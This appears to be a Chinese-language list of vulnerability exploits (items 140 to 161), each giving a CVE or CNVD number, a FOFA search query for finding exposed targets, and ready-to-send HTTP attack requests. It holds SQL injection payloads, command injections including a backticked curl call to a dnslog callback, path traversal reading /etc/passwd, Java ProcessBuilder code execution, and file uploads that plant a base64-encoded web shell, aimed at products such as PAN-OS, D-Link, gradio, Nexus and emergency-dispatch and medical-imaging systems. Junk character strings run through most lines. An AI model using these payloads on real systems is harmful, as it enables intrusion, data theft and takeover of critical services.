+ x8 F2 l6 X8 B4 ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( N2 ?* u9 L( }' R0 \- HAccept-Encoding: gzip, deflate, br
: `: _/ H" A( R2 U0 l, ]! |Connection: close
9 Z% W' q1 o2 H3 h) }) [Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk2 q- v X @# ] G( x4 `
Upgrade-Insecure-Requests: 1( z7 Q* H. _. v' J0 p7 e. p
- v- Z4 ~+ j/ h) e) L3 [& w0 ~% X& w! M6 `) d; u7 Z$ ]! X! v j i
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入1 V* W5 K7 {/ \6 E
CVE-2024-2566
' \1 q$ v7 r4 x$ [4 m$ A# `FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"7 @! {' ]/ \/ `
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.15 y. `2 {- W E4 o9 o/ P
Host: x.x.x.x
! N d" E/ l, ]* o) ~9 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) o6 l& Q2 I. u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 e1 Q8 @7 x& c- e7 j* B- G( v0 {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; M: D8 G# H! j- B- c( d% NAccept-Encoding: gzip, deflate, br
8 Z. k9 j9 `9 g- l9 [3 gConnection: close0 E* B' A% c( v+ `1 d; E& H
Cookie: authcode=h8g98 ^ N0 L7 J/ u4 R2 ?5 m+ ~
Upgrade-Insecure-Requests: 1: a6 u" I6 I5 @: J/ y ?1 U+ w
- R1 R' _$ W: B! e6 G. o
. K/ L" S: s! a/ Z+ l, @" q
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
* X7 g( `# x3 j) S$ Q. B& U8 JFOFA:body="指挥调度管理平台"5 ?" D, S7 {/ c" l- c4 e: S) W2 j
POST /app/ext/ajax_users.php HTTP/1.1
6 \7 B0 G/ z6 B2 `Host: your-ip
2 U. d( R% }( g- j' \User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info1 J+ F% g& {. m; _# b: M
Content-Type: application/x-www-form-urlencoded
) h6 Y( V' I4 ~5 z+ ?& r/ y, f$ q* ?& {1 z" D
* R3 @/ t/ O7 d, \dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
" U! m: K* g# _4 u: p7 y% V3 d- h* N' [& W" T
* }, _- S5 d! y6 A4 ^8 S; u0 F
142. CMSV6车辆监控平台系统中存在弱密码3 n7 [: y1 z1 {
CVE-2024-29666, b8 f- M( a Y9 u6 G9 e- R
FOFA:body="/808gps/"9 I; c' X7 T& j8 S8 n4 e5 z
admin/admin
, `; w6 t6 Q( i( }) f& Z. @143. Netis WF2780 v2.1.40144 远程命令执行1 Q: C$ j$ f, B f% j8 i" {
CVE-2024-25850% n+ s8 G# o3 B7 e
FOFA:title='AP setup' && header='netis'
1 ?( }6 k" I3 T! MPAYLOAD) r+ m# Z! R! [5 L n
: k2 E1 q- e! \! ?( o( }9 d6 P144. D-Link nas_sharing.cgi 命令注入
( o% G( G4 g& b/ Y% lFOFA:app="D_Link-DNS-ShareCenter"; m, j7 M; |7 |& [
system参数用于传要执行的命令
' O! I" G1 O; s- Q( ]& yGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1% Z% {! h6 y9 }, @2 i: \4 V+ |9 R
Host: x.x.x.x
& s4 u) j% k' d0 F, MUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.09 E/ W& n* Y1 t, L6 K6 {5 M
Connection: close
. q6 s3 L3 o$ U2 j: Y% C: B7 zAccept: */*
( l! ]" s2 W, \3 E% G% lAccept-Language: en5 }- I8 B% V, Y9 H
Accept-Encoding: gzip$ g% M0 v P F: A' d' p
* u" y" p$ a6 b* I7 D5 r
* [ h' _$ q5 P) V$ f
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入; y7 n! m* h3 p, _
CVE-2024-3400
" m+ \% W5 S, ], \/ ~FOFA:icon_hash="-631559155"
, _, j$ l3 A) S8 l MGET /global-protect/login.esp HTTP/1.1
2 q. g( T7 _4 m! X: EHost: 192.168.30.112:1005
- n E% t ]' d6 r' t0 t+ p) x8 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84. }- f8 T4 S% M5 A# Q5 t' [8 ^% L
Connection: close* r2 z; l7 w& R' p2 ?
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;- y8 l' [) |3 g
Accept-Encoding: gzip
% _, [& I6 n5 A8 U' z& p0 n0 J
' F2 E+ a* B) h0 k4 ~3 w3 J6 }# U6 b6 v" A I
146. MajorDoMo thumb.php 未授权远程代码执行0 D3 Z, ]0 v0 w7 }7 e
CNVD-2024-02175+ `1 k' J! G4 R- a8 ]% n
FOFA:app="MajordomoSL"
, n. Z2 N; {! p; Q* i& L$ Y3 LGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
; f4 _( ~) K4 O7 P0 }2 m" y# n) LHost: x.x.x.x0 L$ g# d4 u3 f2 _) D7 I9 b& M' e+ }2 ?0 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84 [+ l2 \/ J ^
Accept-Charset: utf-8
6 b2 @9 J3 \/ U" a% I( nAccept-Encoding: gzip, deflate" Z* n- U. Q' [' A5 H
Connection: close
( ~% f7 v$ E; g! h4 ^- w1 I3 a o
* K2 _: |* F- B: ^# ?
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历" A0 o9 X7 [, m- d) Q' V
CVE-2024-32399; C. @( U: J" `( Q, J0 t" s ?
FOFA:body="RaidenMAILD"
" G; H, x( l. _2 R, AGET /webeditor/../../../windows/win.ini HTTP/1.18 v: q/ C1 q1 F9 y% g7 F
Host: 127.0.0.1:81
5 m3 T6 w! M0 _Cache-Control: max-age=03 Y1 z0 R& @. }
Connection: close
l0 _; n9 G2 j% D+ `, F$ ]4 g
: K. C) o) T' ]
[" f3 S8 |, f* H- T148. CrushFTP 认证绕过模板注入
, I F) [9 C) RCVE-2024-4040! T( A; C" s& @* q7 s5 D, r
FOFA:body="CrushFTP"( h, v* T' ?* i- G% M" ~ E* ~
PAYLOAD
4 g$ ~6 D* [4 k6 e& _4 ?# S
3 t w% r; V: T8 j+ G149. AJ-Report开源数据大屏存在远程命令执行8 R- Y0 ], l3 \0 u1 K
FOFA:title="AJ-Report"
3 l+ V* w0 L$ T0 l5 W
) i( B( Y3 m; Q% dPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
1 X" h, z# g8 a- R* h& yHost: x.x.x.x# B/ O% s, f4 D9 T5 J9 Y( _0 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
r& g- y+ V( N! b/ p7 n1 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; w- g( j; l" i7 b& O* T$ D7 g4 e
Accept-Encoding: gzip, deflate, br
* D, Y6 A9 |9 F. E1 b. I' P4 oAccept-Language: zh-CN,zh;q=0.9
[" k' b. Q- ] r8 ~0 B xContent-Type: application/json;charset=UTF-8
" ] s/ r+ I3 E1 w& SConnection: close9 ?$ A% q7 g- t/ |! t! E; u a
" g% m- k. `- r# e{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
1 T, q+ w3 d/ x4 `- M
' @5 q+ B2 }) ~150. AJ-Report 1.4.0 认证绕过与远程代码执行) e! X) C+ g: s$ b0 o3 l
FOFA:title="AJ-Report"
7 b# \# T/ \" b* K; D8 r3 G( ^POST /dataSetParam/verification;swagger-ui/ HTTP/1.17 k$ B- h, S( g( x8 @0 z
Host: x.x.x.x# O# J! o6 q% q& W% Z1 u7 }. ]* H6 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. v8 o4 k/ L. M6 e2 c6 y8 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) Y3 a. e& ]; P7 j) |, o% U6 h
Accept-Encoding: gzip, deflate, br2 q( z* Q8 }: ], [% J
Accept-Language: zh-CN,zh;q=0.9
' z( ~* j1 d3 b! zContent-Type: application/json;charset=UTF-8+ e9 X+ N; B A8 t8 a& u
Connection: close
7 P3 F. W2 B' Q) G: X' }Content-Length: 3392 x% [4 B4 I1 L$ }8 Z4 |: x+ H* G
8 q- {/ V, u% H0 ^/ f9 B* N. k{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} K7 b F' q7 o
# i; g+ V4 T& ^& T
7 f) R, l) {6 V+ L8 ^151. AJ-Report 1.4.1 pageList sql注入2 @: c% X) d! y, d: u2 {
FOFA:title="AJ-Report"
* V. G J' ^: b2 BGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1% N# o* M# ~* N* Y* t
Host: x.x.x.x
1 A( F8 y9 o7 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; ]! }4 {% ?% Z0 B+ `Connection: close
3 I7 s8 b: d5 H: y1 n; DAccept-Encoding: gzip
- Y/ N0 r& P- {
( L& S: S: u" b; \7 }
% e. p2 G, L& z1 Q152. Progress Kemp LoadMaster 远程命令执行
$ A) S0 F2 M) c2 VCVE-2024-1212
# s, h' ~) U1 VLoadMaster <= 7.2.59.2 (GA)6 i- ]+ g' I8 c4 ~
LoadMaster<=7.2.54.8 (LTSF)# R* |. I. q7 n U8 H
LoadMaster <= 7.2.48.10 (LTS)
8 t! Z, o6 a; U* k8 c( |/ |FOFA:body="LoadMaster"- W6 i _, H: n6 B* Q1 y( k" S
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码" E0 l" U4 U d; N1 x. E
GET /access/set?param=enableapi&value=1 HTTP/1.1
% W6 C ?5 K" y1 W0 L7 Y! tHost: x.x.x.x
5 `* @& G) x3 d# O7 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1* w4 D7 {( I3 W4 f- C1 j I
Connection: close
9 l$ R6 T0 N9 R; yAccept: */*$ t" u, E6 m; N& h) c" w
Accept-Language: en
P; b* q4 W3 a/ J, uAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=: {5 I+ I; @2 y* C# ]
Accept-Encoding: gzip3 C( b6 I, m7 E% n! [6 g
7 A7 @9 n+ }, H& E* q
% W1 N) Z# ?! T6 E7 f2 H5 ~153. gradio任意文件读取
# @& a7 u5 ^: O& }CVE-2024-1561FOFA:body="__gradio_mode__". p* z# M' _( ~, @6 g3 _
第一步,请求/config文件获取componets的id
7 h+ ~; e6 Z- `6 H$ H- Qhttp://x.x.x.x/config! n" D6 j' H: G4 H: H3 v( c' B5 {: ?
, `( g/ n: C( I& k( u/ d& Z0 q3 O
2 K2 h \& Z6 |! u' P
第二步,将/etc/passwd的内容写入到一个临时文件
3 a0 \1 ^" \/ A% Y; S, |. zPOST /component_server HTTP/1.1
3 N7 H: ]* H& f; Q# xHost: x.x.x.x
- u$ ^: `$ @3 Y( H& \8 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3* Y3 \0 D4 F- V- t, ?# W
Connection: close
& J3 V4 z6 e9 d. y1 jContent-Length: 115: ~, |6 b6 ]7 }2 c4 I
Content-Type: application/json4 z+ {# G( S, x# r7 C
Accept-Encoding: gzip
, z1 Y5 Q1 u+ e4 n; k8 i. L5 M! ~$ G8 t4 d' O
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
0 |& \0 v- s2 M1 W. d' p' L; T: I
: U( {; w/ W8 q7 v* z0 t; G
第三步访问
9 i, @& X: I7 _http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd; a/ K. I+ B3 H
" c- L- l/ u6 n5 }
" m0 v, [0 b$ _/ E$ }7 u F154. 天维尔消防救援作战调度平台 SQL注入
# p; x1 P/ ^# JCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"* G5 C8 ]9 H6 ]' E- L ~' I
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
9 q C1 p0 L2 M. E, H D. [4 H% @Host: x.x.x.x
* |( W/ l% P% b2 U1 u% Q: bContent-Length: 106& a" s! N8 W2 l8 l- C# [
Cache-Control: max-age=0" }) M1 A8 P# o3 n: F/ X, D
Upgrade-Insecure-Requests: 1
1 ~7 W! ]/ s+ h3 Y6 E$ d- oOrigin: http://x.x.x.x( a3 ^- s5 ~1 l3 Y
Content-Type: application/json% O, F# j! M/ }1 f4 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36% ^/ X8 } Y9 C$ a' J5 _% E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 Y" P2 o; H1 f6 i! NReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
0 h: y: l9 |5 m9 A: x/ n7 SAccept-Encoding: gzip, deflate6 e8 H' d# v# O: S) I& l
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
- x+ F, n* J: S, h0 K; PConnection: close/ J" Q C1 p9 }5 S( }' M% n
8 F o5 b6 S- ]. x% Q
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}! N* o* \1 k ^( W$ Y+ u
" o( R+ W0 p% w* p+ ]4 L `
$ m* X, b3 w) T
155. 六零导航页 file.php 任意文件上传( I d/ I0 Q4 w5 M
CVE-2024-34982" R( W4 c A8 Q# ? C8 S
FOFA:title=="上网导航 - LyLme Spage"
" J5 q w+ ^+ Y$ ?POST /include/file.php HTTP/1.1
( J7 Z8 g, W& U2 u8 I- k& [Host: x.x.x.x% `, H# T% [6 `! p% D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0& d$ ~. c' D) N" e# k
Connection: close3 z% Q0 P \" I$ x7 v8 C
Content-Length: 232
9 q1 B8 W4 J- CAccept: application/json, text/javascript, */*; q=0.01
M( E( \( q3 g; t# jAccept-Encoding: gzip, deflate, br
9 Y" z! v/ _# m( z7 x3 x8 hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. \6 Z$ `. {8 {6 O1 F, Z
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
9 G) T! E' t* e. O1 @X-Requested-With: XMLHttpRequest
+ x! k" \' u5 f, T2 ^: F+ J& d, I
# G' d7 w5 W3 M- {+ _-----------------------------qttl7vemrsold314zg0f
/ ^: q" _4 z- D8 I3 P5 n1 Q1 hContent-Disposition: form-data; name="file"; filename="test.php"
2 K# A$ f$ T" r: Z# j) [" iContent-Type: image/png& I& x5 N) C+ V
2 E" K: Z- `: j6 T% n
<?php phpinfo();unlink(__FILE__);?>1 w! f9 c- g; N& x
-----------------------------qttl7vemrsold314zg0f--. i6 H# H* F, ?4 X; f& l
U2 v5 p4 u. q6 Z' q: [% h# _. j
2 T/ J/ t: o+ D6 r* H6 \访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
5 o, o7 G9 E7 w4 J$ `2 y, x9 `3 _
156. TBK DVR-4104/DVR-4216 操作系统命令注入9 I8 D* V, f7 R0 f4 S
CVE-2024-3721$ J- p# \4 b. P: X7 X' m
FOFA:"Location: /login.rsp"+ E2 D% l; T7 X1 w/ {1 @5 H4 `7 m
·TBK DVR-4104. C. W& |9 T, T: Y
·TBK DVR-4216/ z9 Q1 a3 W8 g, ?1 g* a
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
+ I k7 j: |% U- y6 L2 {" i8 z
4 A, f9 z; p7 ?- Y# J
9 l1 P4 u: y4 W, |% dPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1( U5 Q. h) k7 c
Host: x.x.x.x/ [* c0 j. e8 ?' q8 Q
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' y3 j3 @( v, S& T
Connection: close
[& f) Q( j: vContent-Length: 0
6 K( }- ~' w0 q8 SCookie: uid=1% ]2 c+ I2 a0 f1 e* ~" ^5 f1 U
Accept-Encoding: gzip2 w" V9 C% |; F* h+ z, w
+ L- ^2 K$ O3 }! r. a2 `4 P
6 h C8 k8 B1 ?" e157. 美特CRM upload.jsp 任意文件上传9 x' }) f+ H; ?' |1 e$ D
CNVD-2023-06971# H. y6 Z. N3 t
FOFA:body="/common/scripts/basic.js"
% u6 O0 d; n* ?- L8 a, xPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1" L' ~. e5 z$ z
Host: x.x.x.x
0 Q2 H8 Z5 j$ ?( m* `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
5 g: L3 w( G; f3 m, j( |Content-Length: 7092 W: T8 f2 ?3 B0 t' m( J& L3 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; U6 U: s$ `: w3 X
Accept-Encoding: gzip, deflate, J# _+ y. P/ Z. a, L* K/ I
Accept-Language: zh-CN,zh;q=0.9- D5 x7 e1 j) }7 l
Cache-Control: max-age=0
( h7 }! \1 M! L, B" C3 J0 pConnection: close
* O7 [6 a; @: m& h' TContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN/ @& }% F" Y! A; l
Upgrade-Insecure-Requests: 1
/ {3 f O; B$ y- h! h/ F$ ^6 h, T
/ E$ r# D; P! ]# q. l/ K" }3 s9 j2 |------WebKitFormBoundary1imovELzPsfzp5dN4 Z1 B3 f: H$ x1 T+ I* [
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
: D, q, w) v& kContent-Type: application/octet-stream
$ I+ X; v# Z6 ?+ b! |+ o e$ i v
nyhelxrutzwhrsvsrafb
- ~+ Y* V# @) D' r3 R------WebKitFormBoundary1imovELzPsfzp5dN
' m! A; X1 L7 a! c9 @; DContent-Disposition: form-data; name="key"$ J4 x& a* J: w* Y4 j9 L# T: y
6 o' d: f/ H/ C5 e" }6 y
null, g0 ?: k5 t# O8 t1 O
------WebKitFormBoundary1imovELzPsfzp5dN
5 Z6 a/ X% g) Z7 i2 u. o! ]Content-Disposition: form-data; name="form"
) N( w6 A! Y4 [& M- ]) K1 s2 f) m3 }, T4 |* p. o& E5 J P; d
null$ y2 F, U! E# p; F6 |( B
------WebKitFormBoundary1imovELzPsfzp5dN* t8 g3 H7 U; _$ I9 K5 `0 k
Content-Disposition: form-data; name="field"3 V) x6 [ P! {$ D
/ J7 N" y# ^% J v3 G. f5 Mnull% C$ c$ d/ l) R( w! y
------WebKitFormBoundary1imovELzPsfzp5dN
( a6 P0 R, a/ @/ W* GContent-Disposition: form-data; name="filetitile"- `/ R: T( F t
, `! G9 \' u5 N- u3 m8 H
null
( y4 C( ]6 p: E# a U/ ^) l------WebKitFormBoundary1imovELzPsfzp5dN# ~4 |7 |6 D* I" l/ s! d6 o
Content-Disposition: form-data; name="filefolder"
9 f q6 E: q% V2 I5 U. `& c1 S6 s. b2 l/ N
( c7 U+ P4 b" H+ a* N# w% hnull
6 v" o7 ^; I- n d0 Q6 A, A------WebKitFormBoundary1imovELzPsfzp5dN--
- r; `& O4 `- m
' i% A, H1 b; ]& T6 \! w$ D" U$ M; e- ]0 |8 i3 f
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
, Z5 c- l; c1 \9 h+ i+ k) K8 u* D- ?. J2 U
158. Mura-CMS-processAsyncObject存在SQL注入
" b8 S& ~& c1 E& V8 A$ k6 x' _CVE-2024-32640
+ |5 R! j! _- I7 q* D% E4 sFOFA:"Generator: Masa CMS": a$ W9 |/ \, t% c. a4 D2 T
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1$ b7 h& }$ H% z! _2 r) {
Host: {{Hostname}}
9 j0 D& p. Z8 m+ aContent-Type: application/x-www-form-urlencoded" c/ ^/ k! [: N' g
4 N2 x8 {8 s; |' i$ q! o0 r7 D
object=displayregion&contenthistid=x\'&previewid=1
1 y) p4 N5 N# h8 q1 p
5 y; o0 ?6 O" j% ]1 b" T8 k
7 e! Z1 g. |; X* z, m159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传" T6 J* l, q0 F4 y& V# V
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
# G6 e% @6 B( y3 A! m& i& |POST /webservices/WebJobUpload.asmx HTTP/1.1
1 _+ _- s0 U+ A. @3 {9 {Host: x.x.x.x
6 j. ]/ l0 r: e( |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36! c% I! _. l/ |* I- W! Q: }
Content-Length: 1080 ?- q- {2 |- N( C1 e5 J6 P! r
Accept-Encoding: gzip, deflate
, N: A) e, J7 [2 `6 q2 f( _$ OConnection: close
n8 y! R8 l+ J( |. Q+ K3 pContent-Type: text/xml; charset=utf-8
0 j: T. B( k @# A1 _. z" JSoapaction: "http://rainier/jobUpload"
* M. F# I6 p- X5 l! @& N% o1 w( J6 f/ s6 p0 n
<?xml version="1.0" encoding="utf-8"?>$ N4 g- S7 w8 ~% J6 A& P6 V
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">0 Y' c) B0 P3 }! P+ m1 m4 B t
<soap:Body>
1 ]& Y' A" L0 e5 o9 I) _<jobUpload xmlns="http://rainier">( M* u: F' d: k. e) ^1 ~& c
<vcode>1</vcode>
' P8 v+ G/ i, \1 ~1 T! v; e7 d<subFolder></subFolder>) _: I. u* m% ~2 w& \$ Z: z& _
<fileName>abcrce.asmx</fileName>
8 k! W8 K! V5 E; Z" g( M% K ?5 u<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>+ k K" n. t1 Q$ V
</jobUpload>" E! `: f7 c5 X. Z: w/ f
</soap:Body>
# R( `( Y: g- c, G u! H</soap:Envelope>8 o2 ~! y* E, R* o) {
9 e7 z6 A/ k" b( J6 s! C, R4 V. K9 o e4 | A4 @" D
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")' i6 s. f0 b K* J) r# P2 O
: @7 ~1 D1 f3 \* Z! ^" S$ z7 \$ t8 v9 n' X. R0 o) z, ^* @& |
160. Sonatype Nexus Repository 3目录遍历与文件读取
6 }, M, k3 l$ v+ ~) F8 m% H7 a9 f1 L( bCVE-2024-4956
+ X2 H5 X- \. P$ b4 F- X/ q5 |( uFOFA:title="Nexus Repository Manager"
& F, h( R( G( c2 l$ QGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
) }, m3 n% F6 k3 @3 w& xHost: x.x.x.x
5 w; T: N! o: |7 [* dUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0$ O# ?6 T* @. B" v2 c, t& R# ]( G
Connection: close; i: y! z9 d5 ]. Y# J6 Y
Accept: */*
' B$ z0 E& l3 B7 ]Accept-Language: en5 X) V8 @: O( z& c8 u
Accept-Encoding: gzip- Q/ X# H' a+ U6 _9 _' O
2 S+ V" {' H9 q# Q5 z8 M8 E8 }' P* i
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
6 i8 H% M" G0 o1 E* L8 w6 V! D1 ^FOFA:body="/KT_Css/qd_defaul.css"
/ q2 C- G1 u2 i" D1 G* T$ \第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
1 M- _0 V- k8 z& rPOST /Webservice.asmx HTTP/1.15 ]& ^- x. X0 D/ Q
Host: x.x.x.x+ v4 q" b$ z F" G: N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36& _+ H% w3 a. M9 E
Connection: close1 a4 X% j" L, I( F2 O+ E
Content-Length: 445; i: I, \: i) U4 X
Content-Type: text/xml
! Y$ t9 V9 s# ~" A% ~Accept-Encoding: gzip
4 z/ l$ Q/ {5 {5 V) \* P9 L2 r3 M+ w2 _0 V
<?xml version="1.0" encoding="utf-8"?>
3 }: R! B' k/ b. z) u6 z6 B" x<soap:Envelope xmlns:xsi="
0 b( ]# p$ G `$ Uhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
7 g8 h: D K, w1 hxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
; \. R7 n/ A/ l, C; ?0 d<soap:Body>4 K, Z: X! c: V( N/ a/ M. W
<UploadResume xmlns="http://tempuri.org/">7 ^; {6 s* ~9 h, ?, m
<ip>1</ip>
4 @# |% N+ H2 g4 e: m<fileName>../../../../dizxdell.aspx</fileName>
3 \" j1 k5 j! G2 z7 G<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
( {& I* M5 ^/ k* z8 a+ @2 A- F<tag>3</tag>
H5 c' Z" H) w8 p4 Z0 f</UploadResume>1 V- _/ j: S9 L+ Y
</soap:Body>
7 H* h. s4 ^2 R. s+ u6 A</soap:Envelope>
- O3 M% @7 R8 k+ D* j1 m
- L1 h! r3 z& {) Q$ W% L
7 \8 [, l3 w; y3 jhttp://x.x.x.x/dizxdell.aspx
